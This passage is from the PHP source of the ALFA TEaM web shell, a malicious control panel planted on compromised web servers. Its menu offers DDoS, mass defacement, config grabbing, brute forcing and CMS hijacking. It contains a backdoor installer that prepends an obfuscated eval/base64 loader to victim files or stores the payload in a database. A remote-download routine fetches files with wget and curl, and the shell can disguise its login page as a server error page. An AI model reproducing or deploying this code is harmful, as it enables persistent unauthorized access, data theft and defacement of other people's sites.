                echo "<tr><td height=\"18\" colspan=\"2\"><span class=\"header_vars\">Windows:</span><b>";
                echo alfaEx('ver', false, false);
                echo "</td>\r\n</tr> <tr>\r\n<td height=\"0\" colspan=\"2\"><span class=\"header_vars\">Downloader: </span><b>-------------</b></td>\r\n</tr></b>";
            }
            $quotes = function_exists('get_magic_quotes_gpc') ? get_magic_quotes_gpc() : '0';
            if ($quotes == "1" or $quotes == "on") {
                $magic = '<b><span class="header_on">ON</span>';
            } else {
                $magic = '<span class="header_off">OFF</span>';
            }
            echo '<tr>
<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>' . Alfa_GetDisable_Function() . '</b></td>
</tr>
<tr>
<td height="16" colspan="2"><span class="header_vars">CURL :</span>' . $curl . ' | <span class="header_vars">SSH2 : </span>' . $ssh2 . ' | <span class="header_vars">Magic Quotes : </span>' . $magic . ' | <span class="header_vars"> MySQL :</span>' . $mysql . ' | <span class="header_vars">MSSQL :</span>' . $mssql . ' | <span class="header_vars"> PostgreSQL :</span>' . $pg . ' | <span class="header_vars"> Oracle :</span>' . $or . ' ' . ($GLOBALS['sys'] == "unix" ? '| <span class="header_vars"> CGI :</span> ' . $cgi_shell : "") . '</td><td width="15%"><div id="alfa_solevisible"><center><a href="https://t.me/solevisible" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></div></td>
</tr>
<tr>
<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>' . $open_b . '</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>' . $safe_exe . '</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>' . $safe_include . '</b></td>
</tr>
<tr>
<td height="11"><span class="header_vars">SoftWare: </span></td>
<td colspan="2"><b>' . @getenv('SERVER_SOFTWARE') . '</b></td>
</tr>';
            if ($GLOBALS['sys'] == "win") {
                echo '<tr>
<td height="12"><span class="header_vars">DRIVE:</span></td>
<td colspan="2"><b>' . $drives . '</b></td>
</tr>';
            }
            echo '<tr>
<td height="12"><span class="header_vars">PWD:</span></td>
<td colspan="2"><span id="header_cwd">' . $cwd_links . ' </span><a href="#action=fileman&path=' . $GLOBALS['home_cwd'] . '" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a></td>
</tr>
</table>
</div>
<div id="meunlist">
<ul>
';
            $li = array('proc' => 'Process', 'phpeval' => 'Eval', 'sql' => 'SQL Manager', 'dumper' => 'Database Dumper', 'coldumper' => 'Column Dumper', 'hash' => 'En-Decoder', 'connect' => 'BC', 'zoneh' => 'ZONE-H', 'dos' => 'DDOS', 'safe' => 'ByPasser', 'cgishell' => 'Cgi Shell', 'ssiShell' => 'SSI SHELL', 'cpcrack' => 'Hash Tools', 'portscanner' => 'Port Scaner', 'basedir' => 'Open BaseDir', 'mail' => 'Fake Mail', 'ziper' => 'Compressor', 'deziper' => 'DeCompressor', 'IndexChanger' => 'Index Changer', 'pwchanger' => 'Add New Admin', 'ShellInjectors' => 'Shell Injectors', 'php2xml' => 'PHP2XML', 'cloudflare' => 'CloudFlare', 'Whmcs' => 'Whmcs DeCoder', 'symlink' => 'Symlink', 'MassDefacer' => 'Mass Defacer', 'Crackers' => 'BruteForcer', 'searcher' => 'Searcher', 'config_grabber' => 'Config Grabber', 'fakepage' => 'Fake Page', 'archive_manager' => 'Archive Manager', 'cmshijacker' => 'CMS Hijacker', 'remotedl' => 'Remote Upload', 'inbackdoor' => 'Install BackDoor', 'whois' => 'Whois', 'selfrm' => 'Remove Shell');
            foreach ($li as $key => $value) {
                echo '<li><a id="menu_opt_' . $key . '" href="#action=options&path=' . $GLOBALS['cwd'] . '&opt=' . $key . '" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=' . $key . '\';g(\'' . $key . '\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">' . $value . '</a></li>' . "\n";
            }
            echo '</ul><div style="text-align: center;padding: 6px;"><a id="menu_opt_settings" href="#action=options&path=' . $GLOBALS['cwd'] . '&opt=settings" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=settings\';g(\'settings\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">Alfa Settings</a><a style="display:none;" id="menu_opt_market" href="#action=options&path=' . $GLOBALS['cwd'] . '&opt=market" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=market\';g(\'market\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;"><span class="alfa_plus">Alfa market</span></a><a id="menu_opt_aboutus" href="#action=options&path=' . $GLOBALS['cwd'] . '&opt=aboutus" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=aboutus\';g(\'aboutus\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">About Us</a>' . (!empty($_COOKIE['AlfaUser']) && !empty($_COOKIE['AlfaPass']) ? '<a href="javascript:void(0);" onclick="alfaLogOut();"><font color="red">LogOut</font></a>' : '') . '</div></div><div id="filesman_tabs"><div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" fm_counter="1" path="' . $GLOBALS['cwd'] . '" fm_id="1" id="filesman_tab_1" class="filesman_tab filesman-tab-active" onclick="filesmanTabController(this);"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span>File manager</span></div><div style="display:inline-block;" id="filesman_tabs_child"></div><div id="filesman_new_tab" class="filesman_tab" style="background: maroon;" onClick="alfaFilesManNewTab(c_,\'/\',1);">New Tab +</div></div>';
        } else {
            @error_reporting("\x00\x00\x0f\x03\x18");
            @ini_set('error_log', NULL);
            @ini_set('log_errors', 0);
            @ini_set('max_execution_time', 0);
            @ini_set('magic_quotes_runtime', 0);
            @set_time_limit(0);
        }
    }
    function alfalogout()
    {
        @setcookie("AlfaUser", null, 2012);
        @setcookie("AlfaPass", null, 2012);
        unset($_COOKIE['AlfaUser'], $_COOKIE['AlfaPass']);
        echo "ok";
    }
    function showAnimation($name)
    {
        return '-webkit-animation: ' . $name . ' 800ms ease-in-out forwards;-moz-animation: ' . $name . ' 800ms ease-in-out forwards;-ms-animation: ' . $name . ' 800ms ease-in-out forwards;animation: ' . $name . ' 800ms ease-in-out forwards;';
    }
    function __showicon($r)
    {
        $s['btn'] = 'http://solevisible.com/images/btn.png';
        $s['alfamini'] = 'http://solevisible.com/images/alfamini.png';
        $s['loader'] = 'http://solevisible.com/images/loader.svg';
        //return 'data:image/png;base64,'.__get_resource($s[$r]);
        return $s[$r];
    }
    function alfainbackdoor()
    {
        alfahead();
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick=\"g('inbackdoor',null,'file')\">| In File | </a><a href=javascript:void(0) onclick=\"g('inbackdoor',null,'db')\">| In DataBase | </a></h3></center>";
        $error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
        $success = '<font color="green">Success...!';
        $textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
        $select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
        $cwd = 'Example: /home/alfa/public_html/index.php';
        if ($_POST['alfa1'] == 'file') {
            echo "<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\"><div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select> <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='Example: /home/alfa/public_html/index.php'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '><div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div></form></p></center>";
            if ($_POST['alfa2'] != '' && $_POST['alfa3'] != '' && $_POST['alfa4'] != '') {
                $method = $_POST['alfa2'];
                $file = $_POST['alfa3'];
                $shell = $_POST['alfa4'];
                $key = str_replace(array('"', '\''), '', trim($_POST['alfa5']));
                if ($key == '') {
                    $key = 'alfa';
                }
                if ($method == 'my') {
                    $shell = __ZW5jb2Rlcg($shell);
                } else {
                    $shell = $GLOBALS['__ALFA_SHELL_CODE'];
                }
                $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="' . $key . '"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\\$c));");$x("' . $shell . '");exit;}?>';
                if (@is_file($file) && @is_writable($file)) {
                    @file_put_contents($file, $code . "\n" . @file_get_contents($file));
                    __alert($success . "<br>Run With: " . basename($file) . "?alfa=" . $key . '</font>');
                } else {
                    __alert($error);
                }
            }
        }
        if ($_POST['alfa1'] == 'db') {
            echo "<center><p><div class='txtfont_header'>| In DataBase |</div></p>" . getConfigHtml('all') . "<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">";
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true), 'td6' => array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50'));
            create_table($table);
            echo "<p>{$select}</p>";
            echo $textarea;
            echo "<p><input type='submit' value=' '></p></form></p></center>";
            if ($_POST['alfa2'] != '' && $_POST['alfa3'] != '' && $_POST['alfa5'] != '' && $_POST['alfa6'] != '') {
                $dbhost = $_POST['alfa2'];
                $dbuser = $_POST['alfa3'];
                $dbpw = $_POST['alfa4'];
                $dbname = $_POST['alfa5'];
                $file = $_POST['alfa6'];
                $method = $_POST['alfa7'];
                $shell = $_POST['alfa8'];
                $key = str_replace(array('"', '\''), '', trim($_POST['alfa9']));
                if ($key == '') {
                    $key = 'alfa';
                }
                if ($method == 'my') {
                    $shell = __ZW5jb2Rlcg($shell);
                } else {
                    $shell = $GLOBALS['__ALFA_SHELL_CODE'];
                }
                if ($conn = mysqli_connect($dbhost, $dbuser, $dbpw, $dbname)) {
                    $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="' . $key . '"){$conn=mysqli_connect("' . str_replace('"', '\\"', $dbhost) . '","' . str_replace('"', '\\"', $dbuser) . '","' . str_replace('"', '\\"', $dbpw) . '","' . str_replace('"', '\\"', $dbname) . '");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\\$c));");$x($r["code"]);exit;}?>';
                    if (@is_file($file) && @is_writable($file)) {
                        @mysqli_query($conn, 'DROP TABLE `alfa_bc`');
                        @mysqli_query($conn, 'CREATE TABLE `alfa_bc` (code LONGTEXT)');
                        @mysqli_query($conn, 'INSERT INTO `alfa_bc` VALUES("' . $shell . '")');
                        @file_put_contents($file, $code . "\n" . @file_get_contents($file));
                        __alert($success . "<br>Run With: " . basename($file) . "?alfa=" . $key . '</font>');
                    } else {
                        __alert($error);
                    }
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfawhois()
    {
        echo "<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>";
        if ($_POST['alfa2'] == '>>' && !empty($_POST['alfa1'])) {
            $site = str_replace(array('http://', 'https://', 'www.', 'ftp://'), '', $_POST['alfa1']);
            $target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain=' . $site;
            $data = @file_get_contents($target);
            if ($data == '') {
                $get = new AlfaCURL();
                $get->ssl = true;
                $data = $get->Send($target);
            }
            $target = @json_decode($data, true);
            echo __pre();
            if (is_array($target)) {
                echo $target["whois_raw"];
            } else {
                echo alfaEx("whois " . $site);
            }
        }
        echo "</div>";
    }
    function alfaremotedl()
    {
        alfahead();
        echo "<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>\r\n<form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">\r\n<p><div class='txtfont'>Url: </div>&nbsp;&nbsp;&nbsp;<input type='text' name='d' size='50'></p>\r\n<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='" . $GLOBALS['cwd'] . "'><p><input type='submit' value=' '></p>\r\n</form></p></center>";
        if (isset($_POST['alfa1'], $_POST['alfa2'], $_POST['alfa3']) && !empty($_POST['alfa1']) && $_POST['alfa3'] == '>>') {
            echo __pre();
            $url = $_POST['alfa1'];
            $path = $_POST['alfa2'];
            echo "<center>";
            if (__download($url, $path)) {
                echo "<font color=\"green\">Success...!</font>";
            } else {
                echo "<font color=\"red\">Error...!</font>";
            }
            echo "</center>";
        }
        echo "</div>";
        alfafooter();
    }
    function __download($url, $path = false)
    {
        if (!preg_match("/[a-z]+:\\/\\/.+/", $url)) {
            return false;
        }
        $saveas = basename(rawurldecode($url));
        if ($path) {
            $saveas = $path . $saveas;
        }
        if ($content = __read_file($url)) {
            if (@is_file($saveas)) {
                @unlink($saveas);
            }
            if (__write_file($saveas, $content)) {
                return true;
            }
        }
        $buff = alfaEx("wget " . $url . " -O " . $saveas);
        if (@is_file($saveas)) {
            return true;
        }
        $buff = alfaEx("curl " . $url . " -o " . $saveas);
        if (@is_file($saveas)) {
            return true;
        }
        $buff = alfaEx("lwp-download " . $url . " " . $saveas);
        if (@is_file($saveas)) {
            return true;
        }
        $buff = alfaEx("lynx -source " . $url . " > " . $saveas);
        if (@is_file($saveas)) {
            return true;
        }
        $buff = alfaEx("GET " . $url . " > " . $saveas);
        if (@is_file($saveas)) {
            return true;
        }
        $buff = alfaEx("links -source " . $url . " > " . $saveas);
        if (@is_file($saveas)) {
            return true;
        }
        $buff = alfaEx("fetch -o " . $saveas . " -p " . $url);
        if (@is_file($saveas)) {
            return true;
        }
        return false;
    }
    function clean_string($string)
    {
        if (function_exists("iconv")) {
            $s = trim($string);
            $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
        }
        return $s;
    }
    function __read_file($file, $boom = true)
    {
        $content = false;
        if ($fh = @fopen($file, "rb")) {
            $content = "";
            while (!feof($fh)) {
                $content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
            }
            @fclose($fh);
        }
        if (empty($content) || !$content) {
            $content = alfaEx("cat '" . addslashes($file) . "'");
        }
        return $content;
    }
    function alfaMarket()
    {
        echo "<div class='header'>";
        $curl = new AlfaCURL();
        $content = $curl->Send("http://solevisible.com/market.php");
        $data = @json_decode($content, true);
        if (!empty($data)) {
            if ($data["status"] == "open") {
                echo $data["content"];
            } else {
                echo $data["error_msg"];
            }
        } else {
            echo "<div style='text-align:center;font-size:20px;'>Cant connect to the alfa market....! try later.</div>";
        }
        echo "</div>";
    }
    function alfaSettings()
    {
        alfahead();
        AlfaNum(6, 7, 8, 9, 10);
        echo "<div class=header><center><p><div class=\"txtfont_header\">| Settings |</div></p><h3><a href=javascript:void(0) onclick=\"g('settings',null,null,null,null,null,null,null,null,'main')\">| Generall Setting | </a></h3></center>";
        if ($_POST["alfa8"] == "main") {
            echo "<p><center><div class=\"txtfont_header\">| Settings |</div></p><form onSubmit=\"reloadSetting(this);return false;\" method='post'>";
            $lg_array = array('0' => 'No', '1' => 'Yes');
            $penc_array = array('false' => 'No', 'true' => 'Yes');
            $protect_html = "";
            $icon_html = "";
            $postEnc_html = "";
            $login_html = "";
            $cgiapi_html = "";
            foreach ($lg_array as $key => $val) {
                $protect_html .= '<option value="' . $key . '" ' . ($GLOBALS['DB_NAME']['safemode'] == '1' ? 'selected' : '') . '>' . $val . '</option>';
            }
            foreach ($lg_array as $key => $val) {
                $icon_html .= '<option value="' . $key . '" ' . ($GLOBALS['DB_NAME']['show_icons'] == '1' ? 'selected' : '') . '>' . $val . '</option>';
            }
            foreach ($penc_array as $key => $val) {
                $cgiapi_html .= '<option value="' . $key . '" ' . (!empty($_POST['alfa9']) && $_POST['alfa9'] == $key ? "selected" : ($GLOBALS["DB_NAME"]["cgi_api"] && empty($_POST['alfa9']) ? 'selected' : '')) . '>' . $val . '</option>';
            }
            foreach ($penc_array as $key => $val) {
                $postEnc_html .= '<option value="' . $key . '" ' . (!empty($_POST['alfa7']) && $_POST['alfa7'] == $key ? "selected" : (__ALFA_POST_ENCRYPTION__ && empty($_POST['alfa7']) ? 'selected' : '')) . '>' . $val . '</option>';
            }
            $lg_array = array("gui" => "GUI", "500" => "500 Internal Server Error", "403" => "403 Forbidden", "404" => "404 NotFound");
            foreach ($lg_array as $key => $val) {
                $login_html .= '<option value="' . $key . '" ' . ($GLOBALS['DB_NAME']['login_page'] == $key ? 'selected' : '') . '>' . $val . '</option>';
            }
            echo "";
            echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">' . $protect_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Cgi Api:</div></td><td><select name="cgi_api" style="width:100%;">' . $cgiapi_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">' . $postEnc_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">' . $icon_html . '</select></td></tr><tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">' . $login_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="' . (empty($_POST['alfa3']) ? $GLOBALS['DB_NAME']['user'] : $_POST['alfa3']) . '" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="' . $GLOBALS['DB_NAME']['safemode'] . '"><input type="hidden" name="s" value="' . $GLOBALS['DB_NAME']['show_icons'] . '"><p><input type="submit" name="btn" value=" "></p></form></center>';
            if ($_POST['alfa5'] == '>>') {
                echo __pre();
                if (!empty($_POST['alfa3'])) {
                    $protect = $_POST['alfa1'];
                    $lgpage = $_POST['alfa2'];
                    $username = $_POST['alfa3'];
                    $password = md5($_POST['alfa4']);
                    $icon = $_POST['alfa6'];
                    $post_encrypt = $_POST['alfa7'];
                    $cgi_api_val = $_POST['alfa9'];
                    @chdir($GLOBALS['home_cwd']);
                    $basename = @basename($_SERVER['PHP_SELF']);
                    $data = @file_get_contents($basename);
                    $user_rand = $GLOBALS["DB_NAME"]["user_rand"];
                    $pass_rand = $GLOBALS["DB_NAME"]["pass_rand"];
                    $login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"];
                    $safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"];
                    $show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"];
                    $post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"];
                    $cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"];
                    $find_user = '/\'' . $user_rand . '\'(.*?),/i';
                    $find_pw = '/\'' . $pass_rand . '\'(.*?),/i';
                    $find_lg = '/\'' . $login_page_rand . '\'(.*?),/i';
                    $find_p = '/\'' . $safemode_rand . '\'(.*?),/i';
                    $icons = '/\'' . $show_icons_rand . '\'(.*?),/i';
                    $postEnc = '/\'' . $post_encryption_rand . '\'(.*?),/i';
                    $cgi_api_reg = '/\'' . $cgi_api_rand . '\'(.*?),/i';
                    if (!empty($username) && preg_match($find_user, $data, $e)) {
                        $new = '\'' . $user_rand . '\' => \'' . $username . '\',';
                        $data = str_replace($e[0], $new, $data);
                    }
                    if (!empty($_POST['alfa4']) && preg_match($find_pw, $data, $e)) {
                        $new = '\'' . $pass_rand . '\' => \'' . $password . '\',';
                        $data = str_replace($e[0], $new, $data);
                    }
                    if (!empty($lgpage) && preg_match($find_lg, $data, $e)) {
                        $new = '\'' . $login_page_rand . '\' => \'' . $lgpage . '\',';
                        $data = str_replace($e[0], $new, $data);
                    }
                    if (!empty($find_p) && preg_match($find_p, $data, $e)) {
                        $new = '\'' . $safemode_rand . '\' => \'' . $protect . '\',';
                        $data = str_replace($e[0], $new, $data);
                    }
                    if (preg_match($icons, $data, $e)) {
                        $new = '\'' . $show_icons_rand . '\' => \'' . $icon . '\',';
                        $data = str_replace($e[0], $new, $data);
                    }
                    if (preg_match($postEnc, $data, $e)) {
                        $new = '\'' . $post_encryption_rand . '\' => ' . $post_encrypt . ',';
                        $data = str_replace($e[0], $new, $data);
                    }
                    if (preg_match($cgi_api_reg, $data, $e)) {
                        $new = '\'' . $cgi_api_rand . '\' => ' . $cgi_api_val . ',';
                        $data = str_replace($e[0], $new, $data);
                    }
                    if (@file_put_contents($basename, $data)) {
                        echo '<b>UserName: </b><font color="green"><b>' . $username . '</b></font><br /><b>Password: </b><font color="green"><b>' . $_POST['alfa4'] . '</b></font><script>post_encryption_mode = ' . $post_encrypt . ';</script>';
                    } else {
                        __alert("<span style='color:red;'>File has no edit access...!</span>");
                    }
                } else {
                    __alert("<span style='color:red;'>UserName is Empty !</span>");
                }
            }
        } elseif ($_POST["alfa8"] == "color") {
            echo "<center><p><div class=\"txtfont_header\">| Custom Color |</div></p><form onSubmit=\"reloadColors();return false;\" method='post'>";
            echo "<table border=\"1\"><tbody>";
            $template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
            $x = 1;
            foreach ($GLOBALS['__ALFA_COLOR__'] as $key => $value) {
                $multi = "";
                if (is_array($value)) {
                    if (isset($value["multi_selector"])) {
                        $multi = __ZW5jb2Rlcg(json_encode($value));
                    }
                }
                $value = alfa_getColor($key);
                $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
                echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
            }
            echo "<tr><td style=\"text-align:center;\">-</td><td style=\"text-align:center;\"><div class=\"tbltxt\">*</div></td><td><div style=\"margin-left:5px;\" class=\"tbltxt\">Use Default Color:</div></td><td></td><td><center><input type=\"checkbox\" id=\"use_default_color\" value=\"1\"></center></td></tr>";
            echo "</tbody></table><p><input type=\"submit\" name=\"btn\" value=\" \"></p></form><p><button style=\"padding:4px;;margin-right:20px;\" onclick=\"\$('importFileBtn').click();\" class=\"button\"> Import </button> <button style=\"padding:4px;margin-left:20px;\" onclick=\"g('settings',null,null,null,null,null,null,null,'export','color')\" class=\"button\"> Export </button></center></p>";
            if ($_POST['alfa7'] == 'export') {
                echo __pre();
                $colors = is_array($GLOBALS["DB_NAME"]["color"]) ? $GLOBALS["DB_NAME"]["color"] : array();
                $glob_colors = $GLOBALS["__ALFA_COLOR__"];
                $array = array();
                foreach ($glob_colors as $k => $v) {
                    if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) {
                        $v = trim($colors[$k]);
                    } else {
                        $v = trim(is_array($v) ? $v["key_color"] : $v);
                    }
                    $array[$k] = $v;
                }
                $file = "alfa_color_config_" . date('Y-m-d-h_i_s') . ".conf";
                $config = json_encode($array, JSON_PRETTY_PRINT);
                if (!@file_put_contents($file, $config)) {
                    echo '<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">' . $config . '</textarea></center></p>';
                } else {
                    echo '<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'' . $file . '\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>';
                }
            }
            if ($_POST['alfa2'] == '>>') {
                echo __pre();
                $colors = json_decode($_POST["alfa1"], true);
                $array = "";
                $is_default = isset($_POST["alfa3"]) && $_POST["alfa3"] == "1" ? true : false;
                $glob_colors = $GLOBALS["__ALFA_COLOR__"];
                foreach ($glob_colors as $k => $v) {
                    if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) {
                        $v = trim($colors[$k]);
                    } else {
                        $v = trim(is_array($v) ? $v["key_color"] : $v);
                    }
                    $array .= '"' . trim($k) . '" => "' . $v . '",';
                }
                @chdir($GLOBALS['home_cwd']);
                $basename = @basename($_SERVER['PHP_SELF']);
                $data = @file_get_contents($basename);
                $color = '/\'color\'(.*?)\\),/s';
                if (preg_match($color, $data, $e)) {
                    $new = "'color' => array(" . $array . "),";
                    $data = str_replace($e[0], $new, $data);
                    if (@file_put_contents($basename, $data)) {
                        echo "<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>";
                    } else {
                        echo "<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>";
                    }
                } else {
                    echo "<center><p><h3>[-] Error...!</h3></p></center>";
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaaboutus()
    {
        alfahead();
        echo "<div class=\"header\">";
        $news = new AlfaCURL();
        $about_us = $news->Send("http://solevisible.com/aboutus.php");
        if (empty($about_us)) {
            $about_us = "<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>\r\n<b><font size='+3' color='#00A220'>&#9774; ~ PEACE ~ &#9774;</font><br><b>\r\n<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>\r\n<font color='#00A220'>Contact : solevisible@gmail.com</font><br>\r\n<font color='#00A220'>Telegram Channel: @solevisible</font><br>\r\n<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>\r\n<font color='#FFFFFF'>Skype : sole.sad</font><br>\r\n<font color='#FF0000'>Persian Gulf For Ever</font><br>\r\n<font color='#FF0000'>Iranian Programmers</font><br>\r\n<font color='#FF0000'>############</font><br>\r\n</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
        }
        echo __pre() . $about_us;
        echo "</div>";
        alfafooter();
    }
    function alfacoldumper()
    {
        alfahead();
        echo "<div class=\"header\">";
        AlfaNum(8, 9, 10);
        echo "<center><br><div class='txtfont_header'>| Mysql Column Dumper |</div><br><br>" . getConfigHtml('all') . "<form method='post' onsubmit=\"var opt_id=this.getAttribute('opt_id');var delimiter='json';try{if(\$('dumper-delimiter-type').value == 'delimiter')delimiter=\$('dumper-delimiter-input').value}catch(e){};g('coldumper',null,delimiter,JSON.stringify(col_dumper_selected_data[opt_id]),this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); col_dumper_selected_data[opt_id] = {};return false;\"><p>";
        $delimiter = !empty($_POST['alfa1']) ? $_POST['alfa1'] : '::';
        $selected_data = json_decode($_POST['alfa2'], true);
        $username = $_POST['alfa3'];
        $password = $_POST['alfa4'];
        $dbname = $_POST['alfa5'];
        $dfile = $_POST['alfa6'];
        $host = $_POST['alfa7'];
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => $host, 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => $username, 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => $password, 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => $dbname, 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Output Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']), 'inputSize' => '50'));
        create_table($table);
        echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
